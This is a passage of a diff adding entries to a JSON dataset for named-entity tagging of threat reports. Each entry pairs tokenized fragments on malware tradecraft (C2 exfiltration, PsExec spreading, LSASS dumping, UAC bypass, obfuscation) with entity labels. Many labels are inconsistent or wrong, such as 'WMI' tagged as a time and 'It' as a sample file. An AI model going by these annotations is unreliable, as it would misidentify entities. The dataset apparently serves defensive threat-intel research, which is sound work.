"the", + "running", + "processes", + "on", + "the", + "system", + "and", + "compiles", + "a", + "list", + "of", + "process", + "names", + "and", + "IDs." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "enumerate", + "running", + "processes", + "and", + "send", + "a", + "list", + "of", + "process", + "names", + "and", + "IDs", + "back", + "to", + "the", + "C2" + ], + "ner_tags": [ + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Enumerates", + "running", + "processes" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "loader", + "allocates", + "memory", + "within", + "the", + "current", + "process", + "and", + "then", + "loads", + "the", + "PE", + "payload", + "into", + "it", + "using", + "the", + "full", + "PE", + "loading", + "procedure." + ], + "ner_tags": [ + "O", + "O", + "O", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "It", + "copies", + "the", + "headers,", + "maps", + "the", + "individual", + "PE", + "sections,", + "processes", + "any", + "relocations,", + "loads", + "the", + "PE’s", + "imports,", + "and", + "then", + "executes", + "the", + "PE", + "from", + "its", + "internally", + "specified", + "entry", + "point." + ], + "ner_tags": [ + "B-SamFile", + "I-Features", + "I-Features", + "B-HackOrg", + "I-Features", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "passes", + "the", + "PE", + "payload", + "to", + "it,", + "which", + "the", + "shellcode", + "then", + "loads", + "and", + "executes." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Enumerate", + "files", + "on", + "desktop" + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "Enumerates", + "files", + "under", + "Steam", + "application", + "directory" + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "looping", + "through", + "entries", + "under", + "registry", + "key" + ], + "ner_tags": [ + "B-Way", + "I-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "waits", + "for", + "data", + "collection", + "tasks", + "to", + "complete," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "creating", + "a", + "hash", + "of", + "the", + "collected", + "data,", + "to", + "which", + "it", + "then", + "appends", + "its", + "current", + "process", + "id." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "uploads", + "data", + "to", + "the", + "C2", + "via", + "a", + "HTTP", + "POST", + "request" + ], + "ner_tags": [ + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "http/https", + "data", + "transfer" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Self-delete", + "after", + "sending", + "data" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "It", + "then", + "attempts", + "to", + "connect", + "to", + "the", + "C2", + "via", + "TCP", + "port", + "443" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ranswomare", + "for", + "Windows", + "can", + "self-propagate", + "in", + "the", + "local", + "area", + "network", + "using", + "the", + "legitimate", + "PsExec", + "utility", + "(contained", + "in", + "its", + "body),", + "which", + "creates", + "a", + "temporary", + "system", + "service." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Legitimate", + "accounts", + "obtained", + "by", + "the", + "attackers", + "can", + "be", + "used", + "to", + "ensure", + "persistence", + "in", + "the", + "compromised", + "infrastructure." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "B-Purp" + ] + }, + { + "tokens": [ + "may", + "use", + "stolen", + "legitimate", + "accounts", + "specified", + "in", + "the", + "configuration", + "data." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "uses", + "the", + "command", + "shell", + "to", + "run", + "appropriate", + "commands" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "an", + "additional", + "BAT", + "file", + "contained", + "in", + "the", + "body", + "of", + "the", + "ransomware." + ], + "ner_tags": [ + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "attackers", + "may", + "use", + "wmic", + "to", + "obtain", + "information", + "and", + "run", + "various", + "commands," + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "They", + "may", + "also", + "use", + "the", + "wmiexec", + "module", + "from", + "Impacket", + "to", + "execute", + "commands", + "and", + "move", + "across", + "the", + "network." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "uses", + "wmic", + "to", + "obtain", + "the" + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ransomware", + "uses", + "Native", + "API." + ], + "ner_tags": [ + "O", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "the", + "function", + "CreateProcessWithLogonW." + ], + "ner_tags": [ + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "affiliates", + "may", + "exploit", + "group", + "policies,", + "which", + "results", + "in", + "a", + "scheduled", + "task", + "being", + "created", + "(on", + "each", + "host)", + "that", + "launches", + "the", + "ransomware." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "disabling", + "security", + "tools" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "To", + "prevent", + "being", + "detected,", + "the", + "attackers", + "end", + "processes", + "and", + "services", + "related", + "to", + "security", + "and", + "antivirus", + "software." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "To", + "bypass", + "UAC,", + "BlackCat", + "ransomware", + "may", + "escalate", + "privileges", + "using", + "the", + "ICMLuaUtil", + "COM", + "interface,", + "as", + "well", + "as", + "use", + "the", + "Masquerade", + "PEB", + "method." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O" + ] + }, + { + "tokens": [ + "Bypass", + "User", + "Account", + "Control;The", + "attackers", + "may", + "bypass", + "UAC", + "using", + "the", + "ICMLuaUtil", + "COM", + "interface,", + "as", + "well", + "as", + "use", + "the", + "Masquerade", + "PEB", + "method." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "decrypts", + "configuration", + "data", + "as", + "well", + "as", + "decrypts", + "and", + "unpacks", + "the", + "legitimate", + "PsExec", + "utility" + ], + "ner_tags": [ + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "unpacks", + "the", + "legitimate", + "PsExec", + "utility" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "ransomware", + "uses", + "obfuscation." + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "use", + "a", + "SoftPerfect", + "Network", + "Scanner", + "executable", + "renamed", + "to", + "svchost.exe." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "uses", + "PsExec", + "to", + "modify", + "the", + "system", + "registry", + "parameter", + "MaxMpxCt" + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "To", + "obtain", + "authentication", + "data,", + "the", + "attackers", + "may", + "dump", + "the", + "LSASS", + "process", + "using", + "legitimate", + "tools", + "(procdump,", + "comsvcs.dll)." + ], + "ner_tags": [ + "O", + "O", + "B-Purp", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "To", + "obtain", + "authentication", + "data", + "from", + "the", + "registry", + "and", + "files,", + "the", + "attackers", + "may", + "use", + "NirSoft", + "utilities." + ], + "ner_tags": [ + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "The", + "attackers", + "enumerate", + "drives,", + "directories,", + "and", + "files" + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "search", + "for", + "sensitive", + "information", + "for", + "exfiltration", + "purposes." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "attackers", + "collect", + "information", + "from", + "the", + "local", + "system", + "for", + "exfiltration", + "purposes." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "B-Purp" + ] + }, + { + "tokens": [ + "The", + "attackers", + "may", + "use", + "RDP", + "to", + "move", + "across", + "the", + "network." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Purp", + "O" + ] + }, + { + "tokens": [ + "uses", + "wmic", + "to", + "obtain", + "the", + "UUID", + "of", + "the", + "compromised", + "host." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "B-Purp", + "O", + "O" + ] + }, + { + "tokens": [ + "enumerates", + "all", + "running", + "processes" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + ";Moving", + "across", + "the", + "victim’s", + "network", + "and", + "deploying", + "ransomware", + "involves", + "copying", + "related", + "tools", + "to", + "the", + "host." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "can", + "self-propagate", + "in", + "the", + "network", + "by", + "using", + "the", + "legitimate", + "PsExec", + "utility" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "to", + "search", + "for", + "ones", + "relating", + "to", + "security" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "enumerates", + "system", + "services", + "to", + "search", + "for", + "ones", + "relating", + "to", + "security" + ], + "ner_tags": [ + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Before", + "exfiltration,", + "the", + "attackers", + "may", + "put", + "collected", + "data", + "in", + "7Zip", + "archives." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Remote", + "access", + "tools", + "used", + "by", + "the", + "attackers", + "may", + "use", + "application", + "layer", + "protocols", + "(HTTP,", + "HTTPS," + ], + "ner_tags": [ + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "B-Way", + "B-Way" + ] + }, + { + "tokens": [ + "When", + "the", + "attackers", + "use", + "Cobalt", + "Strike,", + "the", + "collected", + "information", + "may", + "be", + "sent", + "via", + "Cobalt", + "Strike", + "server", + "communication", + "channels." + ], + "ner_tags": [ + "O", + "O", + "B-HackOrg", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "To", + "remotely", + "access", + "the", + "compromised", + "infrastructure,", + "the", + "attackers", + "may", + "use", + "the", + "legitimate", + "tools", + "TeamViewer", + "and", + "ScreenConnect." + ], + "ner_tags": [ + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "To", + "remotely", + "access", + "the", + "compromised", + "infrastructure,", + "the", + "attackers", + "may", + "use", + "Cobalt", + "Strike,", + "TeamViewer", + "and", + "ScreenConnect" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "which", + "perform", + "asymmetric/symmetric", + "encryption", + "of", + "the", + "C&C", + "server", + "communication", + "channel." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "attackers", + "copy", + "tools", + "necessary", + "for", + "deployment", + "to", + "the", + "compromised", + "host." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "malware", + "executes", + "a", + "command", + "to", + "delete", + "itself", + "from", + "the", + "system" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "delete", + "key", + "files" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "attackers", + "have", + "been", + "seen", + "using", + "several", + "methods", + "to", + "distribute", + "the", + "wiper", + "through", + "the", + "domain,", + "like:", + "domain", + "Group", + "Policy", + "Object", + "(GPO)" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "installs", + "the", + "payload", + "as", + "a", + "service" + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "sets", + "a", + "hardcoded", + "list", + "of", + "system", + "directories" + ], + "ner_tags": [ + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "system", + "directories", + "are", + "targeted" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "enumerates", + "their", + "partitions." + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "an", + "obfuscated", + ".NET", + "program." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "WMI" + ], + "ner_tags": [ + "B-Time" + ] + }, + { + "tokens": [ + "to", + "identify", + "where", + "the", + "Operative", + "System", + "is", + "stored", + "in", + "the", + "disk" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Application-level", + "protocol" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "sends", + "the", + "output", + "of", + "ipconfig", + "in", + "a", + "POST", + "request" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "opening", + "of", + "a", + "URL", + "file", + "extracted", + "from", + "the", + "archive." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "output", + "of", + "ipconfig", + "was", + "sent", + "to", + "one", + "of", + "two", + "addresses" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Application-level", + "protocol" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "a", + "GET", + "request", + "is", + "sent", + "to", + "the", + "C2", + "server." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "application-level", + "messages", + "from", + "the", + "server", + "to", + "the", + "client", + "is", + "sent", + "as", + "the", + "body", + "of", + "an", + "HTTP", + "response" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "are", + "sent", + "using", + "separate", + "POST", + "requests." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "sends", + "an", + "HTTPS", + "request" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "same", + "IP", + "address", + "was", + "used", + "as", + "C2", + "server" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "domains", + "give", + "attackers", + "the", + "ability", + "to", + "mask", + "malicious", + "traffic", + "as", + "legitimate", + "activity", + "within", + "the", + "company" + ], + "ner_tags": [ + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HttpConnector", + "and", + "HttpBindConnector", + "are", + "HTTP", + "client", + "with", + "support", + "for", + "proxy", + "and", + "HTTP", + "server." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "HTTP", + "and", + "HTTPS", + "are", + "supported" + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "HTTP", + "with", + "long", + "polling" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "connect", + "by", + "sending", + "a", + "GET", + "request", + "to", + "a", + "URL", + "from", + "the", + "configuration", + "and", + "provide", + "a", + "special", + "cookie", + "value" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "sends", + "GET", + "requests", + "with", + "pull", + "operations." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "POST", + "request", + "with", + "push", + "operation" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Application-level", + "protocol" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "use", + "HTTP/HTTPS", + "for", + "C2", + "connections" + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "An", + "encrypted", + "resume" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "archive" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "archive", + "contains", + "a", + "bait", + "PDF", + "document" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "XOR", + "encrypted", + "with", + "a", + "16-byte", + "key" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "obfuscated", + "with", + "VMProtect" + ], + "ner_tags": [ + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "additional", + "XOR", + "encryption", + "with", + "the", + "key" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AES-128-CBC", + "for", + "encryption." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "hashed", + "with", + "MD5" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "use", + "AES-128", + "in", + "CFB", + "mode", + "as", + "the", + "encryption", + "algorithm" + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "encrypted", + "with", + "the", + "algorithm" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "a", + "RAR", + "archive" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "distributed", + "in", + "a", + "RAR", + "archive" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ROR-13", + "hash" + ], + "ner_tags": [ + "B-Idus", + "O" + ] + }, + { + "tokens": [ + "re-encrypted", + "and", + "saved", + "in", + "the", + "same", + "location" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "encrypted", + "header" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "encrypted", + "Base64", + "string", + "containing", + "the", + "session", + "GUID" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "compressed", + "with", + "GZip", + "prior", + "to", + "encryption" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "are", + "obfuscated", + "with", + "VMProtect" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "obfuscated" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "obfuscated", + "code" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "is", + "encrypted", + "in", + "the", + "file" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "is", + "re-encrypted" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "has", + "been", + "obfuscated", + "with", + "the", + "same", + "rel_jmp", + "and", + "fake-jb", + "techniques" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "SFX", + "archive" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "SFX", + "archive" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "RAR", + "and", + "SFX-RAR", + "files" + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "plus", + "the", + "folder" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "malicious", + "archive," + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "located", + "in", + "the", + "data", + "sections" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "shellcode", + "is", + "located", + "in", + "a", + "PE", + "file", + "overlay." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "(encrypted)", + "shellcode" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "consists", + "of", + "two", + ".exe", + "files." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "contains", + "three", + "identical", + "executable", + "files" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "contains", + "just", + "one", + "file:" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "which", + "is", + "also", + "embedded", + "inside", + "the", + "CHM", + "file" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile" + ] + }, + { + "tokens": [ + "three", + "sections", + "are", + "extracted" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "malicious", + "shortcuts" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "Web", + "lnks", + "with", + "two", + "shortcuts:" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "copies", + "the", + "payload", + "to", + "the", + "folder", + "C:\\Users\\Public\\Downloads" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PDF", + "documents", + "with", + "a", + "CV", + "and", + "IELTS", + "certificate" + ], + "ner_tags": [ + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "B-Tool" + ] + }, + { + "tokens": [ + "the", + "folder", + "C:\\Users\\Public" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "copied", + "to", + "the", + "folder", + "%appdata%\\Microsoft\\AddIns\\" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "into", + "the", + "folder", + "c:\\programdata" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "folder", + "c:\\programdata" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "trying", + "to", + "open", + "either", + "of", + "the", + "shortcuts" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "If", + "the", + "user", + "opens", + "it", + "directly" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "tries", + "to", + "make", + "users", + "run", + "malicious", + ".lnk,", + ".chm,", + "and", + ".exe", + "files" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "running", + "a", + "command", + "that", + "extracts", + "a", + "Base64-encoded", + "CAB", + "archive", + "from", + "the", + "body", + "of", + "the", + "LNK", + "file," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "archive", + "is", + "unpacked", + "to", + "a", + "temporary", + "folder." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "an", + "extracted", + "JS", + "script" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "extract", + "shellcode" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "decrypts", + "the", + "string" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "used", + "for", + "decryption:" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "is", + "unpacked" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "unpacks" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "encrypted", + "portion", + "of", + "the", + "data", + "is", + "decrypted" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "is", + "decrypted" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "decryption", + "and", + "decompression" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decryption" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "decodes", + "it", + "into", + "shellcode", + "with", + "Base64" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decrypt" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "uses", + "a", + "custom", + "PL", + "format", + "with", + "encryption" + ], + "ner_tags": [ + "O", + "O", + "I-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "adding", + "itself", + "to", + "the", + "startup", + "folder" + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "writes", + "the", + "file", + "svchost.bat,", + "which", + "transfers", + 